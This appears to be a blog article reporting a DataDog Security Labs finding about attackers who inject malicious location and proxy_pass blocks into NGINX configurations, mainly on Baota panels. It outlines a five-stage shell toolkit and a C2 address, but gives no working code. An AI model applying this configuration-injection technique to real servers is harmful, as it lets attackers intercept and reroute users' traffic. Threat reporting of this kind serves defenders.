Imagine your website suddenly sending visitors to a completely different, unknown place without you even knowing! That's precisely what's happening in a sophisticated cyberattack where hackers are compromising NGINX servers, effectively hijacking user traffic and rerouting it through their own hidden infrastructure. It’s a stealthy operation that can leave website owners and their users in the dark.
For those new to the scene, NGINX is a powerful, open-source tool that acts as a traffic manager for the web. Think of it as a super-efficient concierge for your website, handling connections between users and the server. It’s widely used for serving web pages, balancing incoming requests to prevent overload, caching content for faster delivery, and acting as a reverse proxy to shield your main servers.
This particular malicious campaign, brought to light by the sharp eyes at DataDog Security Labs, is targeting NGINX installations, especially those paired with Baota hosting management panels. The attackers seem to have a preference for sites with Asian top-level domains like .in, .id, .pe, .bd, and .th, as well as official .edu and .gov sites. This broad targeting suggests a wide net is being cast.
But here's where it gets clever and concerning: The attackers aren't breaking into NGINX through a traditional vulnerability. Instead, they're subtly altering existing NGINX configuration files. They inject malicious ‘location’ blocks, which are essentially rules that tell NGINX how to handle specific web addresses. These blocks are designed to intercept incoming requests for URLs chosen by the attackers. They then cleverly rewrite these requests to include the full original URL and, using the ‘proxy_pass’ directive, forward the traffic to domains controlled by the attackers.
Now, the ‘proxy_pass’ directive is usually a legitimate tool used for load balancing. It allows NGINX to distribute traffic across different server groups to boost performance or ensure reliability. Because the attackers are using a function that's already part of NGINX’s normal operations, it’s much less likely to trigger any security alarms. This is a key reason why these attacks have gone unnoticed for so long.
To make their hijacked traffic look as legitimate as possible, the attackers meticulously preserve crucial request headers like ‘Host,’ ‘X-Real-IP,’ ‘User-Agent,’ and ‘Referer’. This makes the rerouted traffic appear as if it's coming from the original, trusted source.
And this is the part most people miss: The entire attack process is orchestrated by a scripted, multi-stage toolkit. This isn't a simple one-off hack; it's a carefully planned operation with distinct phases:
- Stage 1 – zx.sh: This is the mastermind script. It’s responsible for downloading and executing all the subsequent stages. It even has a clever fallback: if standard download tools like
curlorwgetaren't available, it can send raw HTTP requests over TCP to get the job done. - Stage 2 – bt.sh: This script specifically targets NGINX configurations managed by the Baota panel. It intelligently picks injection templates based on the server’s name and then safely overwrites the configuration. Crucially, it reloads NGINX in a way that aims to avoid any noticeable service interruption.
- Stage 3 – 4zdh.sh: This stage is all about discovery and careful modification. It searches for common NGINX configuration file locations (like
sites-enabled,conf.d, andsites-available). It uses sophisticated parsing tools to prevent corrupting the configuration files. It also checks for any previous injections by using hashing and a global mapping file, and most importantly, it validates the proposed changes usingnginx -tbefore applying them and reloading the service. - Stage 4 – zdh.sh: This script takes a more focused approach, primarily targeting NGINX configurations in
/etc/nginx/sites-enabled, with a particular emphasis on .in and .id domains. It follows a similar process of testing and reloading configurations, but it includes a forceful restart (pkill) as a last resort if needed. - Stage 5 – ok.sh: This is the final stage, where the attackers gather intelligence. It scans all the compromised NGINX configurations to build a comprehensive map of hijacked domains, the injection templates used, and the attacker’s proxy targets. All this valuable data is then sent back to a command-and-control (C2) server located at 158.94.210[.]227.
What makes this attack so insidious? It’s incredibly difficult to detect. Since no actual NGINX vulnerability is exploited, the malicious instructions are simply hidden within configuration files, which are often overlooked during routine security checks. Furthermore, because user traffic still reaches its intended destination – often directly – the fact that it briefly passes through an attacker’s infrastructure might go completely unnoticed unless very specific, granular monitoring is in place.
This situation raises a critical question: Are our web servers as secure as we think if they can be manipulated so subtly? And for website owners, how can you ensure your configurations are truly safe from such hidden threats?
What are your thoughts on this method of attack? Do you believe traditional security measures are sufficient against these kinds of configuration-based compromises? Let us know in the comments below!
